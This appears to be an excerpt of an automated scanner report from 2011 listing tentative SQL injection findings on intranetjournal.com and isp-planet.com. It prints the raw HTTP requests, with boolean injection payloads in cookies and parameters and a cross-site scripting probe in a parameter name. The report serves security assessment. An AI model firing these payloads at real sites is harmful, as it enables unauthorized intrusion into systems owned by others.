X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

{"history":true,"resp":15,"url":"vcloud_express.cfm","query":"","name":"vcloud_express","title":"vCloud Express Public Cloud Offering- Cloud Hosting | Cloud Servers | Managed Cloud Hosting | Managed C
...[SNIP]...

1.4. http://www.intranetjournal.com/ [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.intranetjournal.com
Path:   /

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payloads 27357565'%20or%201%3d1--%20 and 27357565'%20or%201%3d2--%20 were each submitted in the __utmz cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4=1 HTTP/1.1
Host: www.intranetjournal.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QUADIDX=107; intmintc__welcome; toURL=http%3A//www.intranetjournal.com/%3Fc5d85--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E177b53bcb4%3D1; qsg=14508; __utmz=167246694.1298042932.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)27357565'%20or%201%3d1--%20; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298035735007:ss=1298035735007; __utma=167246694.598188733.1298042932.1298042932.1298042932.1; __utmc=167246694; __utmb=167246694.2.10.1298042932

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 16:52:07 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 16:53:07 GMT
Content-Type: text/html
Content-Length: 149349


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<HTML>
<HEAD>
<!-- test -->
<link href="http://www.intranetjournal.com/feed.xml" rel="alternate" type="application/rss+xml" title="Intranet Jou
...[SNIP]...
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=661113/661095/661075/581331/581034;s=9539;x=7936;f=1242120994;u=j;z=20110218115207" target="_blank">
<img border="0" width="0" height="0" src="http://o1.qnsr.com/cgi/x?;n=203;c=661113/661095/661075/581331/581034;s=9539;x=7936;f=1242120994;u=j;z=20110218115207" alt="Click here"></a>
</noscript>
</span>

<div class="KonaFilter">
<!------ OAS AD 'house_ribbon' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('house_ribbon');
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="http://63.236.18.118/RealMedia/ads/click_nx.ads/intm/it/www.intranetjournal.com/?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/index@125x125-1,120x60-1,flex,468x60-1,accessunit,accessunit_one,accessunit_three,accessunit_two,ciu,336x280-2,house_ribbon,send,cp1,cp2,cp3,cp4,cp5,cp6,cp7,cp8,cp9,cp10,cp11,cp12,cp13,cp14!house_ribbon" >
<IMG SRC="http://63.236.18.118/RealMedia/ads/adstream_nx.ads/intm/it/www.intranetjournal.com/?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/index@125x125-1,120x60-1,flex,468x60-1,accessunit,accessunit_one,accessunit_three,accessunit_two,ciu,336x280-2,house_ribbon,send,cp1,cp2,cp3,cp4,cp5,cp6,cp7,cp8,cp9,cp10,cp11,cp12,cp13,cp14!house_ribbon" border=0>
</A>
</NOSCRIPT>
<!------ OAS AD 'house_ribbon' end ------>
</div>


<script type="text/javascript" src="/icom_includes/toolbars/globaltoolbar/scripts/globaltoolbar-js.js"></script>
<style type="text/css"> #navitoolbarcontainer a { line-height: 16px; } ::root menulist, .menulist ul{margin-top:-10px} .menulist, .menulist ul{margin:0; padding:0; list-style:none; font:9px arial; color:#fff; float:left; display:inline} .menulist a:visited{color:#fff; text-decoration:none} .menulist ul{ display:none; position:absolute; top:1.0em; margin-top:12px; left:-1px; width:180px; color:#fff} .menulist ul ul{ top:-1px; margin-top:0; left:148px; color:#fff; z-index:200} .menulist li{ float:left; display:block; position:relative; background:#676767; border:1px solid #999; border-bottom:0px solid #999; border-top:0px solid #999; margin-right:-1px; background-image:url('/icom_includ
...[SNIP]...

Request 2

GET /?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4=1 HTTP/1.1
Host: www.intranetjournal.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QUADIDX=107; intmintc__welcome; toURL=http%3A//www.intranetjournal.com/%3Fc5d85--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E177b53bcb4%3D1; qsg=14508; __utmz=167246694.1298042932.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)27357565'%20or%201%3d2--%20; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298035735007:ss=1298035735007; __utma=167246694.598188733.1298042932.1298042932.1298042932.1; __utmc=167246694; __utmb=167246694.2.10.1298042932

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 16:52:08 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 16:53:08 GMT
Content-Type: text/html
Content-Length: 149339


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<HTML>
<HEAD>
<!-- test -->
<link href="http://www.intranetjournal.com/feed.xml" rel="alternate" type="application/rss+xml" title="Intranet Jou
...[SNIP]...
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=661113/661095/661075/581331/581034;s=9539;x=7936;f=462930559;u=j;z=20110218115208" target="_blank">
<img border="0" width="0" height="0" src="http://o1.qnsr.com/cgi/x?;n=203;c=661113/661095/661075/581331/581034;s=9539;x=7936;f=462930559;u=j;z=20110218115208" alt="Click here"></a>
</noscript>
</span>

<div class="KonaFilter">
<!------ OAS AD 'house_ribbon' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('house_ribbon');
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="http://63.236.18.118/RealMedia/ads/click_nx.ads/intm/it/www.intranetjournal.com/?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/index@125x125-1,120x60-1,flex,468x60-1,accessunit,accessunit_one,accessunit_three,accessunit_two,ciu,336x280-2,house_ribbon,send,cp1,cp2,cp3,cp4,cp5,cp6,cp7,cp8,cp9,cp10,cp11,cp12,cp13,cp14!house_ribbon" >
<IMG SRC="http://63.236.18.118/RealMedia/ads/adstream_nx.ads/intm/it/www.intranetjournal.com/?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/index@125x125-1,120x60-1,flex,468x60-1,accessunit,accessunit_one,accessunit_three,accessunit_two,ciu,336x280-2,house_ribbon,send,cp1,cp2,cp3,cp4,cp5,cp6,cp7,cp8,cp9,cp10,cp11,cp12,cp13,cp14!house_ribbon" border=0>
</A>
</NOSCRIPT>
<!------ OAS AD 'house_ribbon' end ------>
</div>


<script type="text/javascript" src="/icom_includes/toolbars/globaltoolbar/scripts/globaltoolbar-js.js"></script>
<style type="text/css"> #navitoolbarcontainer a { line-height: 16px; } ::root menulist, .menulist ul{margin-top:-10px} .menulist, .menulist ul{margin:0; padding:0; list-style:none; font:9px arial; color:#fff; float:left; display:inline} .menulist a:visited{color:#fff; text-decoration:none} .menulist ul{ display:none; position:absolute; top:1.0em; margin-top:12px; left:-1px; width:180px; color:#fff} .menulist ul ul{ top:-1px; margin-top:0; left:148px; color:#fff; z-index:200} .menulist li{ float:left; display:block; position:relative; background:#676767; border:1px solid #999; border-bottom:0px solid #999; border-top:0px solid #999; margin-right:-1px; background-image:url('/icom_includes
...[SNIP]...

1.5. http://www.intranetjournal.com/ [c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.intranetjournal.com
Path:   /

Issue detail

The c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4 parameter appears to be vulnerable to SQL injection attacks. The payloads 60248758'%20or%201%3d1--%20 and 60248758'%20or%201%3d2--%20 were each submitted in the c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4 parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4=160248758'%20or%201%3d1--%20 HTTP/1.1
Host: www.intranetjournal.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QUADIDX=107; intmintc__welcome; toURL=http%3A//www.intranetjournal.com/%3Fc5d85--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E177b53bcb4%3D1; qsg=14508; __utmz=167246694.1298042932.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298035735007:ss=1298035735007; __utma=167246694.598188733.1298042932.1298042932.1298042932.1; __utmc=167246694; __utmb=167246694.2.10.1298042932

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 16:49:54 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 16:50:54 GMT
Content-Type: text/html
Content-Length: 149480


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<HTML>
<HEAD>
<!-- test -->
<link href="http://www.intranetjournal.com/feed.xml" rel="alternate" type="application/rss+xml" title="Intranet Jou
...[SNIP]...
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=661113/661095/661075/581331/581034;s=9539;x=7936;f=243729054;u=j;z=20110218114954" target="_blank">
<img border="0" width="0" height="0" src="http://o1.qnsr.com/cgi/x?;n=203;c=661113/661095/661075/581331/581034;s=9539;x=7936;f=243729054;u=j;z=20110218114954" alt="Click here"></a>
</noscript>
</span>

<div class="KonaFilter">
<!------ OAS AD 'house_ribbon' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('house_ribbon');
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="http://63.236.18.118/RealMedia/ads/click_nx.ads/intm/it/www.intranetjournal.com/?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/index@125x125-1,120x60-1,flex,468x60-1,accessunit,accessunit_one,accessunit_three,accessunit_two,ciu,336x280-2,house_ribbon,send,cp1,cp2,cp3,cp4,cp5,cp6,cp7,cp8,cp9,cp10,cp11,cp12,cp13,cp14!house_ribbon" >
<IMG SRC="http://63.236.18.118/RealMedia/ads/adstream_nx.ads/intm/it/www.intranetjournal.com/?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/index@125x125-1,120x60-1,flex,468x60-1,accessunit,accessunit_one,accessunit_three,accessunit_two,ciu,336x280-2,house_ribbon,send,cp1,cp2,cp3,cp4,cp5,cp6,cp7,cp8,cp9,cp10,cp11,cp12,cp13,cp14!house_ribbon" border=0>
</A>
</NOSCRIPT>
<!------ OAS AD 'house_ribbon' end ------>
</div>


<script type="text/javascript" src="/icom_includes/toolbars/globaltoolbar/scripts/globaltoolbar-js.js"></script>
<style type="text/css"> #navitoolbarcontainer a { line-height: 16px; } ::root menulist, .menulist ul{margin-top:-10px} .menulist, .menulist ul{margin:0; padding:0; list-style:none; font:9px arial; color:#fff; float:left; display:inline} .menulist a:visited{color:#fff; text-decoration:none} .menulist ul{ display:none; position:absolute; top:1.0em; margin-top:12px; left:-1px; width:180px; color:#fff} .menulist ul ul{ top:-1px; margin-top:0; left:148px; color:#fff; z-index:200} .menulist li{ float:left; display:block; position:relative; background:#676767; border:1px solid #999; border-bottom:0px solid #999; border-top:0px solid #999; margin-right:-1px; background-image:url('/icom_includes
...[SNIP]...

Request 2

GET /?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4=160248758'%20or%201%3d2--%20 HTTP/1.1
Host: www.intranetjournal.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QUADIDX=107; intmintc__welcome; toURL=http%3A//www.intranetjournal.com/%3Fc5d85--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E177b53bcb4%3D1; qsg=14508; __utmz=167246694.1298042932.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298035735007:ss=1298035735007; __utma=167246694.598188733.1298042932.1298042932.1298042932.1; __utmc=167246694; __utmb=167246694.2.10.1298042932

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 16:49:54 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 16:50:54 GMT
Content-Type: text/html
Content-Length: 149490


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<HTML>
<HEAD>
<!-- test -->
<link href="http://www.intranetjournal.com/feed.xml" rel="alternate" type="application/rss+xml" title="Intranet Jou
...[SNIP]...
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=661113/661095/661075/581331/581034;s=9539;x=7936;f=932006327;u=j;z=20110218114954" target="_blank">
<img border="0" width="0" height="0" src="http://o1.qnsr.com/cgi/x?;n=203;c=661113/661095/661075/581331/581034;s=9539;x=7936;f=932006327;u=j;z=20110218114954" alt="Click here"></a>
</noscript>
</span>

<div class="KonaFilter">
<!------ OAS AD 'house_ribbon' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('house_ribbon');
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="http://63.236.18.118/RealMedia/ads/click_nx.ads/intm/it/www.intranetjournal.com/?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/index@125x125-1,120x60-1,flex,468x60-1,accessunit,accessunit_one,accessunit_three,accessunit_two,ciu,336x280-2,house_ribbon,send,cp1,cp2,cp3,cp4,cp5,cp6,cp7,cp8,cp9,cp10,cp11,cp12,cp13,cp14!house_ribbon" >
<IMG SRC="http://63.236.18.118/RealMedia/ads/adstream_nx.ads/intm/it/www.intranetjournal.com/?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/index@125x125-1,120x60-1,flex,468x60-1,accessunit,accessunit_one,accessunit_three,accessunit_two,ciu,336x280-2,house_ribbon,send,cp1,cp2,cp3,cp4,cp5,cp6,cp7,cp8,cp9,cp10,cp11,cp12,cp13,cp14!house_ribbon" border=0>
</A>
</NOSCRIPT>
<!------ OAS AD 'house_ribbon' end ------>
</div>


<script type="text/javascript" src="/icom_includes/toolbars/globaltoolbar/scripts/globaltoolbar-js.js"></script>
<style type="text/css"> #navitoolbarcontainer a { line-height: 16px; } ::root menulist, .menulist ul{margin-top:-10px} .menulist, .menulist ul{margin:0; padding:0; list-style:none; font:9px arial; color:#fff; float:left; display:inline} .menulist a:visited{color:#fff; text-decoration:none} .menulist ul{ display:none; position:absolute; top:1.0em; margin-top:12px; left:-1px; width:180px; color:#fff} .menulist ul ul{ top:-1px; margin-top:0; left:148px; color:#fff; z-index:200} .menulist li{ float:left; display:block; position:relative; background:#676767; border:1px solid #999; border-bottom:0px solid #999; border-top:0px solid #999; margin-right:-1px; background-image:url('/icom_includes
...[SNIP]...

1.6. http://www.intranetjournal.com/ [intmintc__welcome; toURL cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.intranetjournal.com
Path:   /

Issue detail

The intmintc__welcome; toURL cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the intmintc__welcome; toURL cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4=1 HTTP/1.1
Host: www.intranetjournal.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QUADIDX=107; intmintc__welcome; toURL=http%3A//www.intranetjournal.com/%3Fc5d85--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E177b53bcb4%3D1'%20and%201%3d1--%20; qsg=14508

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 16:53:06 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 16:54:06 GMT
Content-Type: text/html
Content-Length: 149341


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<HTML>
<HEAD>
<!-- test -->
<link href="http://www.intranetjournal.com/feed.xml" rel="alternate" type="application/rss+xml" title="Intranet Jou
...[SNIP]...
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=661113/661095/661075/581331/581034;s=9539;x=7936;f=1000379096;u=j;z=20110218115306" target="_blank">
<img border="0" width="0" height="0" src="http://o1.qnsr.com/cgi/x?;n=203;c=661113/661095/661075/581331/581034;s=9539;x=7936;f=1000379096;u=j;z=20110218115306" alt="Click here"></a>
</noscript>
</span>

<div class="KonaFilter">
<!------ OAS AD 'house_ribbon' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('house_ribbon');
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="http://63.236.18.118/RealMedia/ads/click_nx.ads/intm/it/www.intranetjournal.com/?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/index@125x125-1,120x60-1,flex,468x60-1,accessunit,accessunit_one,accessunit_three,accessunit_two,ciu,336x280-2,house_ribbon,send,cp1,cp2,cp3,cp4,cp5,cp6,cp7,cp8,cp9,cp10,cp11,cp12,cp13,cp14!house_ribbon" >
<IMG SRC="http://63.236.18.118/RealMedia/ads/adstream_nx.ads/intm/it/www.intranetjournal.com/?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/index@125x125-1,120x60-1,flex,468x60-1,accessunit,accessunit_one,accessunit_three,accessunit_two,ciu,336x280-2,house_ribbon,send,cp1,cp2,cp3,cp4,cp5,cp6,cp7,cp8,cp9,cp10,cp11,cp12,cp13,cp14!house_ribbon" border=0>
</A>
</NOSCRIPT>
<!------ OAS AD 'house_ribbon' end ------>
</div>


<script type="text/javascript" src="/icom_includes/toolbars/globaltoolbar/scripts/globaltoolbar-js.js"></script>
<style type="text/css"> #navitoolbarcontainer a { line-height: 16px; } ::root menulist, .menulist ul{margin-top:-10px} .menulist, .menulist ul{margin:0; padding:0; list-style:none; font:9px arial; color:#fff; float:left; display:inline} .menulist a:visited{color:#fff; text-decoration:none} .menulist ul{ display:none; position:absolute; top:1.0em; margin-top:12px; left:-1px; width:180px; color:#fff} .menulist ul ul{ top:-1px; margin-top:0; left:148px; color:#fff; z-index:200} .menulist li{ float:left; display:block; position:relative; background:#676767; border:1px solid #999; border-bottom:0px solid #999; border-top:0px solid #999; margin-right:-1px; background-image:url('/icom_include
...[SNIP]...

Request 2

GET /?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4=1 HTTP/1.1
Host: www.intranetjournal.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QUADIDX=107; intmintc__welcome; toURL=http%3A//www.intranetjournal.com/%3Fc5d85--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E177b53bcb4%3D1'%20and%201%3d2--%20; qsg=14508

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 16:53:07 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 16:54:07 GMT
Content-Type: text/html
Content-Length: 149353


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<HTML>
<HEAD>
<!-- test -->
<link href="http://www.intranetjournal.com/feed.xml" rel="alternate" type="application/rss+xml" title="Intranet Jou
...[SNIP]...
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=661113/661095/661075/581331/581034;s=9539;x=7936;f=1284103644;u=j;z=20110218115308" target="_blank">
<img border="0" width="0" height="0" src="http://o1.qnsr.com/cgi/x?;n=203;c=661113/661095/661075/581331/581034;s=9539;x=7936;f=1284103644;u=j;z=20110218115308" alt="Click here"></a>
</noscript>
</span>

<div class="KonaFilter">
<!------ OAS AD 'house_ribbon' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('house_ribbon');
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="http://63.236.18.118/RealMedia/ads/click_nx.ads/intm/it/www.intranetjournal.com/?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/index@125x125-1,120x60-1,flex,468x60-1,accessunit,accessunit_one,accessunit_three,accessunit_two,ciu,336x280-2,house_ribbon,send,cp1,cp2,cp3,cp4,cp5,cp6,cp7,cp8,cp9,cp10,cp11,cp12,cp13,cp14!house_ribbon" >
<IMG SRC="http://63.236.18.118/RealMedia/ads/adstream_nx.ads/intm/it/www.intranetjournal.com/?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/index@125x125-1,120x60-1,flex,468x60-1,accessunit,accessunit_one,accessunit_three,accessunit_two,ciu,336x280-2,house_ribbon,send,cp1,cp2,cp3,cp4,cp5,cp6,cp7,cp8,cp9,cp10,cp11,cp12,cp13,cp14!house_ribbon" border=0>
</A>
</NOSCRIPT>
<!------ OAS AD 'house_ribbon' end ------>
</div>


<script type="text/javascript" src="/icom_includes/toolbars/globaltoolbar/scripts/globaltoolbar-js.js"></script>
<style type="text/css"> #navitoolbarcontainer a { line-height: 16px; } ::root menulist, .menulist ul{margin-top:-10px} .menulist, .menulist ul{margin:0; padding:0; list-style:none; font:9px arial; color:#fff; float:left; display:inline} .menulist a:visited{color:#fff; text-decoration:none} .menulist ul{ display:none; position:absolute; top:1.0em; margin-top:12px; left:-1px; width:180px; color:#fff} .menulist ul ul{ top:-1px; margin-top:0; left:148px; color:#fff; z-index:200} .menulist li{ float:left; display:block; position:relative; background:#676767; border:1px solid #999; border-bottom:0px solid #999; border-top:0px solid #999; margin-right:-1px; background-image:url('/icom_include
...[SNIP]...

1.7. http://www.isp-planet.com/about/sitemap.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.isp-planet.com
Path:   /about/sitemap.html

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /about/sitemap.html?1'%20and%201%3d1--%20=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:30:29 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 17:31:29 GMT
Connection: close
Content-Type: text/html
Content-Length: 66508


<HTML>
<HEAD>
<TITLE>ISP-Planet - Welcome</TITLE>
<META name="description" content="ISP-Planet has business and marketing advice for ISPs, plus specialized isp information resources. It reports on IS
...[SNIP]...
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=695826/641338/581996/581034;s=9538;x=3584;f=1175618564;u=j;z=20110218123029" target="_blank">
<img border="0" width="728" height="90" src="http://o1.qnsr.com/cgi/x?;n=203;c=695826/641338/581996/581034;s=9538;x=3584;f=1175618564;u=j;z=20110218123029" alt="Click here"></a>
</noscript>
</div>

</TD>
</TR>
<TR>
<TD align="center"><span class='quad_S'><style type="text/css">
span.ciu_wrapper div { padding: 10px; }
</style><span class="ciu_wrapper">

<script language="JavaScript">zzfocrender("203", "9538", "644262/641338/581996/581034", "59", "600", "200", "", "", "");</script>
<noscript>
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=644262/641338/581996/581034;s=9538;x=15104;f=1189705527;u=j;z=20110218123029" target="_blank">
<img border="0" width="600" height="200" src="http://o1.qnsr.com/cgi/x?;n=203;c=644262/641338/581996/581034;s=9538;x=15104;f=1189705527;u=j;z=20110218123029" alt="Click here"></a>
</noscript>
</span></div>
</TD>
</TR>
</table>

</center>
</td> </TR>
<TR>
<TD width="20%" valign="TOP">
<CENTER>
&nbsp;<A href="http://www.internet.com/"><IMG src="/img/icom-logo-micro.gif" width="130" height="28" border="0" alt="Internet.com"></A><BR>
<!-- =====SPONSORSHIP===== -->
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /about/sitemap.html?1'%20and%201%3d1--%20=1 --><span class='quad_sitetext-1'></div>

<div align="left"> <p>&nbsp;</p>
<p align="center"><BR>
<!--AdSpacesite=internetcom&foo=bar&size=125x125&PagePos=10&channel=_CHANNEL_&content_site=_SITE_&feature=_FEATURE_-->
<span class='quad_J'>
<script language="JavaScript">zzfocrender("203", "9538", "641865/641338/581996/581034", "6", "125", "125", "", "", "");</script>
<noscript>
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=641865/641338/581996/581034;s=9538;x=1536;f=1153674472;u=j;z=20110218123029" target="_blank">
<img border="0" width="125" height="125" src="http://o1.qnsr.com/cgi/x?;n=203;c=641865/641338/581996/581034;s=9538;x=1536;f=11536
...[SNIP]...

Request 2

GET /about/sitemap.html?1'%20and%201%3d2--%20=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:30:30 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 17:31:30 GMT
Connection: close
Content-Type: text/html
Content-Length: 66498


<HTML>
<HEAD>
<TITLE>ISP-Planet - Welcome</TITLE>
